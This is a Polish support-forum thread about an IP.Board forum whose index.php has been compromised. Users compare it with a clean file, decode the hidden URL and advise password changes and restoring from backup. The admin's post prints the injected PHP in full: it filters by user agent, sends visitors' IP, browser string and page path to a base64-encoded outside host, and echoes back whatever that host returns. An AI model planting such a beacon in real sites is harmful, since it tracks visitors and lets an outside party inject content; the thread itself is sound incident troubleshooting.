Skocz do zawartości
Hosting webh.pl - 20%

ROZWIĄZANY: Malware na forum.

subek

Przez subek
w Ogólny support IPB

 Udostępnij

Rekomendowane odpowiedzi

subek Współpracownik

subek

Opublikowano
  • Autor
Opublikowano (edytowane)

No ja konkretnie nie widzę żadnych zmian, natomiast userzy (w temacie do którego podałem linka, możesz rzucić okiem) piszą, że jakieś cyrki się dzieją.

Edit, wszedłem z IE i takie coś wywala

Warning: Cannot modify header information - headers already sent by (output started at /index.php:22) in /admin/sources/classes/output/formats/html/htmlOutput.php on line 114

Warning: Cannot modify header information - headers already sent by (output started at /index.php:22) in /admin/sources/classes/output/formats/html/htmlOutput.php on line 127

Warning: Cannot modify header information - headers already sent by (output started at /index.php:22) in /admin/sources/classes/output/formats/html/htmlOutput.php on line 136

Warning: Cannot modify header information - headers already sent by (output started at /index.php:22) in /admin/sources/classes/output/formats/html/htmlOutput.php on line 137

Warning: Cannot modify header information - headers already sent by (output started at /index.php:22) in /admin/sources/classes/output/formats/html/htmlOutput.php on line 141

Edytowane przez subek
www.NissanTech.pl
subek Współpracownik

subek

Opublikowano
  • Autor
Opublikowano 
<?php if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
   // This code use for global bot statistic
   $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
   $stCurlHandle = NULL;
   $stCurlLink = "";
   if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
   {
       if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
       $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
           $stCurlHandle = curl_init( $stCurlLink ); 
   }
   } 
if ( $stCurlHandle !== NULL )
{
   curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
   $sResult = @curl_exec($stCurlHandle); 
   if ($sResult[0]=="O") 
    {$sResult[0]=" ";
     echo $sResult; // Statistic code end
     }
   curl_close($stCurlHandle); 
}
} 
/**
* <pre>
* Invision Power Services
* IP.Board v3.2.3
* Main public executable wrapper.
* Set-up and load module to run
* Last Updated: $Date: 2011-03-11 12:41:48 -0500 (Fri, 11 Mar 2011) $
* </pre>
*
* @author  $Author: ips_terabyte $
* @copyright (c) 2001 - 2009 Invision Power Services, Inc.
* @license http://www.invisionpower.com/community/board/license.html
* @package IP.Board
* @link http://www.invisionpower.com
* @version $Rev: 8042 $
*
*/ 

define( 'IPB_THIS_SCRIPT', 'public' );
require_once( './initdata.php' );/*noLibHook*/

require_once( IPS_ROOT_PATH . 'sources/base/ipsRegistry.php' );/*noLibHook*/
require_once( IPS_ROOT_PATH . 'sources/base/ipsController.php' );/*noLibHook*/

ipsController::run();

exit();

www.NissanTech.pl
Georgeon Użytkownik społeczności

Georgeon

Opublikowano
Opublikowano (edytowane)

Usuń program za pomocą którego łączysz się na ftp, przeskanuj komputer antywirusem, zmien hasło do ftp i podmien pliki index.php, albo najlepiej wszystkie pliki z ftp usuń i wyślij backup.

Edytowane przez Georgeon
  • Lubię to 1
Budyn Biegły

Budyn

Opublikowano
Opublikowano

Sprawdź na FTP datę i godzinę modyfikacji index.php

i sprawdź jak się będzie forum zachowywało na czystym index.php

Długi masz ten index u mnie wygląda tak :

<?php
/**
* <pre>
* Invision Power Services
* IP.Board v3.2.3
* Main public executable wrapper.
* Set-up and load module to run
* Last Updated: $Date: 2011-03-11 12:41:48 -0500 (Fri, 11 Mar 2011) $
* </pre>
*
* @author         $Author: ips_terabyte $
* @copyright    (c) 2001 - 2009 Invision Power Services, Inc.
* @license        http://www.invisionpower.com/community/board/license.html
* @package        IP.Board
* @link        http://www.invisionpower.com
* @version        $Rev: 8042 $
*
*/    

define( 'IPB_THIS_SCRIPT', 'public' );
require_once( './initdata.php' );/*noLibHook*/

require_once( IPS_ROOT_PATH . 'sources/base/ipsRegistry.php' );/*noLibHook*/
require_once( IPS_ROOT_PATH . 'sources/base/ipsController.php' );/*noLibHook*/

ipsController::run();

exit();

  • Lubię to 1

pre_1383606035__stonefly2.gif

subek Współpracownik

subek

Opublikowano
  • Autor
Opublikowano

Usuń program za pomocą którego łączysz się na ftp, przeskanuj komputer antywirusem, zmien hasło do ftp i podmien pliki index.php, albo najlepiej wszystkie pliki z ftp usuń i wyślij backup.

Ode mnie to raczej nie wyszło, nie wchodziłem na ftp od dawna, a jak wchodzę to spod linuxa. Pierwsze co zrobiłem to zablokowałem dostęp do ftp innym adminom.

Zacznę podmieniać pliki i zobaczę co się będzie działo.

www.NissanTech.pl
Georgeon Użytkownik społeczności

Georgeon

Opublikowano
Opublikowano
Ode mnie to raczej nie wyszło, nie wchodziłem na ftp od dawna.

Nie koniecznie, nie wiem jak łączysz się z ftp, ale niektóre programy mają zapisaną historię ostatnich połączeń z serwerem.

Budyn Biegły

Budyn

Opublikowano
Opublikowano

Wgrałem do siebie Twój index.php i miałem to samo co Ty.

Zwróc uwagę na tą linijke :

       $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);

Po zmianie fragmentu 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw' na xxx "błędy" znikają.

Więc teraz pytanie , co jest zakodowane w tym ? ;)

https://www.google.com/search?q=aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:pl:official&client=firefox-a

  • Lubię to 1

pre_1383606035__stonefly2.gif

Jakub Arcymistrz

Jakub

Opublikowano
Opublikowano

Zakodowany jest ten adres:

http://adveconfirm.com/stat/stat.php

Nasz kolega już siedział za piracką wersję IPB, Ty też możesz
† Będziemy bronić SB po kres naszych sił †
Nie ma bolca na izolca!!!
Tłumaczes Power

  • Manager
DawPi Arcymistrz

DawPi

Opublikowano
  • Manager
Opublikowano

Problem ROZWIĄZANY. Jeśli są jakiekolwiek wątpliwości, pytania proszę o założenie nowego tematu.

Wszelkie uzasadnione reklamacje/pretensje/sugestie/rady przyjmuje ekipa forum.

intermedia - profesjonalne rozwiązania Invision Power Board

---

Chcesz uzyskać szybko i sprawnie pomoc? Uzupełnij wersję i adres w profilu.

Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
 Udostępnij
Tematy

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę.